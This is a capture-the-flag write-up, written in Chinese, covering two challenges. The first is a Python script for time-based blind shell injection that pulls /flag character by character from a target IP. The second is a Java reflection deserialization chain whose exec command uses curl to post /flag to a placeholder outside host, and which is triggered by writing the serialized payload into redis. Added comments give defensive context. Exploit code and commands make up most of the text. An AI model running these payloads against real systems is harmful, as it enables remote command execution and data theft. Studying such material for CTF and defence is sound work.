幫幫小紅花
二分法,shell注入
SLEEP_TIME可以設置的稍微長點,會穩定很多。
import requests
import time
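# Time-based blind command injection through the `imagin` query parameter,
# which the target evidently hands to a shell: each request either sleeps
# SLEEP_TIME or returns at once, so response latency leaks one comparison.
# Defender's note: the root cause is interpolating request input into a shell
# command; on the server side this shows up as a burst of requests to a single
# endpoint whose latencies cluster at ~0 and ~SLEEP_TIME.
url = "http://183.129.189.60:10070/?imagin="
requests.adapters.DEFAULT_RETRIES = 3  # max reconnect attempts, to survive hiccups
SLEEP_TIME = 0.25  # a somewhat longer sleep is more stable on a noisy link
kai_shi = time.time()
flag = ""
i = 0  # 1-based position of the character currently being recovered
print("[start]: -------")
while True:
    # Binary search over printable ASCII (32..126) for the code of character i.
    head = 32
    tail = 127
    i += 1
    while head < tail:
        mid = (head + tail) >> 1
        # h3zh1 is character i of /flag; printf '%d' "'c" yields the code of c,
        # so the server sleeps iff that code is greater than mid.
        payload = '''h3zh1=$( cat /flag | cut -c %d-%d );if [ $( printf '%%d' "'$h3zh1" ) -gt %d ];then sleep %f;fi''' % (i, i, mid, SLEEP_TIME)
        start_time = time.time()
        requests.get(url + payload)
        end_time = time.time()
        if end_time - start_time > SLEEP_TIME:
            head = mid + 1
        else:
            tail = mid
    # Past the end of the flag the cut is empty and (in the author's setup) no
    # request sleeps, so the search settles on 32 -- the loop's only exit.
    if head != 32:
        flag += chr(head)
        print("[+]: " + flag)
    else:
        break
print("[end]: " + flag)
jie_shu = time.time()
# The original printed `jieshu - kaishi`, two undefined names, and so died with
# a NameError after the flag had already been printed; the timers are
# kai_shi / jie_shu.
print("程序運行時間:" + str(jie_shu - kai_shi))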
布吉島
涉及java反序列化、反射、redis簡單命令
知識點可以參考下方鏈接,基本上一個鏈接就講得很明白了。
師傅出的這個題反射思路是一樣的。
結束了才寫完,才發現,原來我走了那么多坑,tcl,謝謝imagin師傅好心救我。
imagin師傅說我的思路差不多
java & python構造exp
package lucky;
import DatabaseHandler.Handler;
import DatabaseHandler.SerializeUtil;
import ReflectionHandler.Chain;
import ReflectionHandler.Const;
import ReflectionHandler.DoMethod;
import ReflectionHandler.Reflect;
import java.io.*;
/**
 * Builds the reflection gadget chain from the write-up, serializes it to
 * h3zh1.bin, and then deserializes that file locally to check that the chain
 * replays. Const, DoMethod, Chain and SerializeUtil are project classes
 * (ReflectionHandler / DatabaseHandler) whose sources are not on this page;
 * the per-step intent below follows the original author's comments.
 *
 * Defender's note: the sink is SerializeUtil.deserialize(), i.e. readObject()
 * on bytes a client can write (the write-up plants them in redis under the
 * user's uuid). The fix belongs there: do not deserialize client-writable
 * data, or at minimum install an ObjectInputFilter allow-list so that the
 * Chain/DoMethod classes cannot be resolved from untrusted input.
 */
public class H3zh1 {
    public static void main(String[] args) throws Exception {
        // Each Reflect step is presumably applied to the result of the previous
        // one when the chain is replayed (Chain.doMethod below); verify against
        // ReflectionHandler, which is not shown here.
        Reflect[] transformers = new Reflect[] {
            // Start from the Runtime class object.
            new Const(Runtime.class),
            // Reflectively call getMethod, which in turn looks up getRuntime,
            // yielding the Method for Runtime.getRuntime().
            new DoMethod("getMethod",
                new Class[] {String.class, Class[].class },
                new Object[] {"getRuntime", new Class[0] }),
            // Call invoke to reflectively execute Runtime.getRuntime() and obtain the Runtime.
            new DoMethod("invoke",
                new Class[] {Object.class, Object[].class },
                new Object[] {null, new Object[0] }),
            // Call exec to run the command (author's placeholder host; the command
            // posts the contents of /flag to it).
            new DoMethod("exec",
                new Class[] {String.class },
                new Object[] {"curl http://xxx.xxx.xxx -d @/flag"})
            //new Object[] {"clac"})// local test: launches the calculator ("clac" reads like a typo for "calc")
        };
        Chain transformerChain = new Chain(transformers);
        //System.out.println(transformerChain);
        // Serialize the chain to h3zh1.bin; the write-up base64-encodes this file next.
        try{
            File f = new File("h3zh1.bin");
            ObjectOutputStream out = new ObjectOutputStream(new FileOutputStream(f));
            out.writeObject(transformerChain);
            out.flush();
            // NOTE(review): not reached if writeObject throws; try-with-resources
            // would close the stream on every path.
            out.close();
        }catch (IOException e){
            e.printStackTrace();
        }
        // The code below only checks that the chain runs successfully on the author's machine.
        try {
            FileInputStream f = new FileInputStream("h3zh1.bin");
            DataInputStream dis = null;
            dis = new DataInputStream(f);
            // NOTE(review): a fixed 1024-byte buffer, and read(byte[]) may return
            // fewer bytes than the file holds; neither stream is closed afterwards.
            byte []b = new byte [1024];
            dis.read(b);
            // This deserialize() call is the same sink the target exposes.
            Chain expobject = (Chain) SerializeUtil.deserialize(b);
            expobject.doMethod("c",null);
            // System.out.println(expobject.getClass());
        }
        catch (FileNotFoundException e){
            e.printStackTrace();
        }catch (ClassNotFoundException e){
            e.printStackTrace();
        }catch (IOException e){
            e.printStackTrace();
        }
    }
}
把得到的二進制文件用base64編碼輸出,引用我之前寫Think java的腳本。
import base64
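# Base64-encode the serialized chain written by the Java program.
# The `with` block closes the handle even if read() raises; the original
# only closed it on the success path.
with open("h3zh1.bin", "rb") as fh:
    ba = base64.b64encode(fh.read())
# b64encode returns bytes, so this prints the repr form b'...'; the quotes and
# the b prefix are not part of the encoded value.
print(ba)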
接下來是觸發
關鍵代碼塊1(product.jsp)
關鍵代碼塊2(Handler.java)
關鍵代碼3(SerializeUtil)
這段代碼擁有readObject(),唯一的觸發點
想要使第一段關鍵代碼觸發就得使uuid有對應的data數據。
得到序列化的字段後,要登錄redis,然後去設置。
(redis是可以登錄的,我是沒想到的,我當時看了很久覺得除了這個辦法沒別的了,後來dkk師傅也告訴我可以,不過我ip地址輸錯了所以一直沒上去過)。
後來換了java項目的10049端口~(枯了),比賽結束幾分鐘後問了問師傅,師傅說是端口錯了(正確的redis端口是10050),我真是蠢了,一個服務一個端口,怨不得題目給那個提示。(心情複雜.jpg)。
真是弟弟……。
靶機沒斷繼續復現。。。
接下來就是去redis把數據加上,然后訪問觸發序列化即可。
整個鏈就是Handler::getData()一系列的反射-->SerializeUtil::deserialize()中的readObject()觸發
連接redis
先看看自己的uuid對應的data字符串,顯示肯定是空的
hget uuid data
設置一下自己python中得到的base64序列化字符串
hset uuid data
"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"
可以參考我的,不過我的ip和uuid和你們的不一樣。
如下僅供參考,直接跑是得不到flag的。
hget c8a7ec06aeb24dfb92dde7292f21fb62 data
hset c8a7ec06aeb24dfb92dde7292f21fb62 data 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